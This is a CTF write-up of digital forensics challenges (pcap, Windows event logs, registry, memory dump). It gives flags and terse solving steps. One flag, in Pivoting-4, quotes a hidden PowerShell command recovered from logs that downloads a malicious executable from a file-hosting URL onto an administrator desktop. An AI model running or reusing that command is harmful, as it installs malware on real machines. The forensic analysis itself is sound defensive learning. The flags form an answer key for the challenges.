My write-ups to many Digital Forensics challenges in Cyber Security
Competition (CSC - 1)
In this CTF competition, we got 10th place after great work and speed in solving challenges
Name : MalDoc
Category: Digital Forensics
Level: Medium
Flag : EGCERT{Pawned}
SOLUTION
the challenge was pcap
file so I opened it
with networkminer
in files section i saw 2
malicious files
so i opened them and i
found the 2 files contain base64 content
then i Used CyberChef , and
got the flags
Name : Pivoting-1
Category: Digital Forensics
Level: Medium
Flag : EGCERT{ssh}
SOLUTION
the description of the
challenge :The IT staff has noticed an abnormal activities, they contacted the Incident Response
team to take logs and investigate.
so i start to use "A
Golang EVTX Parser" tool
i start to Parser Security.evtx file to try to find any abnormal activities
"LogonProcessName" is a field that appears in Security.evtx, which is the Windows Security event
log. It refers to the name of the process responsible for handling a user's logon attempt.
When a user attempts to log on to a Windows computer, an authentication process takes place.
During this process, the user's credentials are verified by the operating system, and if the
credentials are valid, the user is granted access to the system. The "LogonProcessName" field in
Security.evtx records the name of the process that handles this authentication process.
The LogonProcessName field can be useful in troubleshooting issues related to user logons, such
as failed logon attempts or unauthorized access attempts. By examining this field in
Security.evtx, security administrators can identify which process was responsible for handling a
particular logon attempt and use this information to investigate any anomalous or suspicious
activity.
i used "sort -u" to show
uniqe result and don't repeate
then i decided to try
"ssh" in the flag format and i got the right flag EGCERT{ssh}
Name : Pivoting-2
Category: Digital Forensics
Level: Medium
Flag : EGCERT{C:\Program Files\atx_1.py}
SOLUTION
it was easy , just see the
content of the challenge
Name : Pivoting-3
Category: Digital Forensics
Level: Medium
Flag : EGCERT{mali.exe}
SOLUTION
so i start to use "A
Golang EVTX Parser" tool
the description of the challenge :What is the name of the malicious executable that was
downloaded on DC01?
so i decided to search in powerShell
and just search about http , and i got the flag
Name : Pivoting-4
Category: Digital Forensics
Level: Medium
Flag : EGCERT{powershell.exe -w hidden -noni -nop -exec EX
https://www.mediafire.com/file/3bytgnxqzimrns0/mali.exe
C:\Users\Administrator\Desktop\mali.exe}
SOLUTION
when we solve "Pivoting-2"
challenge, we saw the full command , just here
Name : Pivoting-5
Category: Digital Forensics
Level: Medium
Flag : EGCERT{bruteforce}
SOLUTION
the description of the challenge : What was the technique used to access Workstation_2?
so i start to Parser Security.evtx file
i searched for "event id for failed login"
i realised that there is a large number of failed login
and in small time too !
so simply it is bruteforce
Name : Pivoting-6
Category: Digital Forensics
Level: Medium
Flag : EGCERT{192.168.118.155}
SOLUTION
the description of challenge was unclear, so i can not solve it in the competition , after
competition i see this description in challenge file
and from "Pivoting-7" challenge i know the flag is "EGCERT{Workstation_2, Workstation_1, DC01}"
so all i want is getting the ip of Workstation_2
i tried to open SYSTEM registry file using the Registry Explorer tool but i get this error
so i searched about this erorr
i found this amazing artical here
"https://cybermeisam.medium.com/blue-team-system-live-analysis-part-11-windows-user-account-forensics-ntuser-dat-495ab41393db"
and his suggestion to use these tools
so i install "RegRipper3.0" and used it
and i get the ip
Name : Pivoting-7
Category: Digital Forensics
Level: Medium
Flag : EGCERT{Workstation_2, Workstation_1, DC01}
SOLUTION
the description of the
challenge : Using the names (DC01, Workstaion_1, Workstation_2)
so i test :
EGCERT{Workstation_2, DC01, Workstation_1}
EGCERT{Workstation_2, Workstation_1, DC01}
Name : Twodrive
Category: Digital Forensics
Level: Medium
Flag :
EGCERT{C:\Users\CAIOS\Desktop\VCRUNTIME140_1.dll:974f1000}
SOLUTION
i started by search about
.dmp Forensics and i found this website
"https://helpdeskgeek.com/windows-10/how-to-analyze-memory-dump-files-dmp-in-windows-10/"
so i install the tool and
searched about cheat-sheet for it and i found this website
"https://theartofdev.com/windbg-cheat-sheet/"
i tried many commands
untill i found this
i tried many with
"C:\Users\CAIOS\Desktop\twodrive.exe" but it was not correct
but "C:\Users\CAIOS\Desktop\VCRUNTIME140_1.dll" was right